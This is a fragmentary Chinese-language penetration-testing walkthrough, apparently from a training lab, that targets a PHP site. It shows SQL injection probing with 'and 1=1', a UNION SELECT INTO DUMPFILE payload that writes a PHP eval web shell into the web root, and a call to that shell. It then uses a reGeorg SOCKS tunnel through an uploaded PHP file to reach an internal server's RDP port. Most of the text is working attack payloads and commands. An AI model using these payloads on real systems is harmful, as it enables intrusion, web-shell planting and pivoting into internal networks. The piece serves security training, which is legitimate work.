and 1=1
正常,输入and 1=2
报错,证明存在sql注入C:\phpStudy\WWW\index.php
,此时可以得知字段数为2以及网站的绝对路径http://c78exn-5qmtbw.aqlab.cn/?id=1 union select 1,'<?php eval($_REQUEST[8])?>' into dumpfile 'C:/phpStudy/WWW/rocky.php'
,该语句的意思是:通过联合查询,在数据库中查询数据1和<?php eval($_REQUEST[8]) ?>
,并将结果导出到C:/phpStudy/WWW/中的rocky.php文件中<?php eval($_REQUEST[8]) ?>
是字符串,所以要加单引号http://c78exn-5qmtbw.aqlab.cn/rocky.php?8=phpinfo();
,获得shellhttp://c78exn-5qmtbw.aqlab.cn
对应IP59.63.166.70
的3389端口不是目标服务器的端口,59.63.166.70:3389映射了该2003R2的服务器的3389端口,那么我们如果要访问目标服务器的3389的话,可以使用内网的其他服务器来进行访问 reGeorgSocksProxy
,本地运行指令:reGeorgSocksProxy.py -l 127.0.0.1 -p 10080 -u http://c78exn-5qmtbw.aqlab.cn/1234.php
,意思是127.0.0.1:10080端口的数据转发给目标网站的1234.php,而该php会让目标主机进行网络访问打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.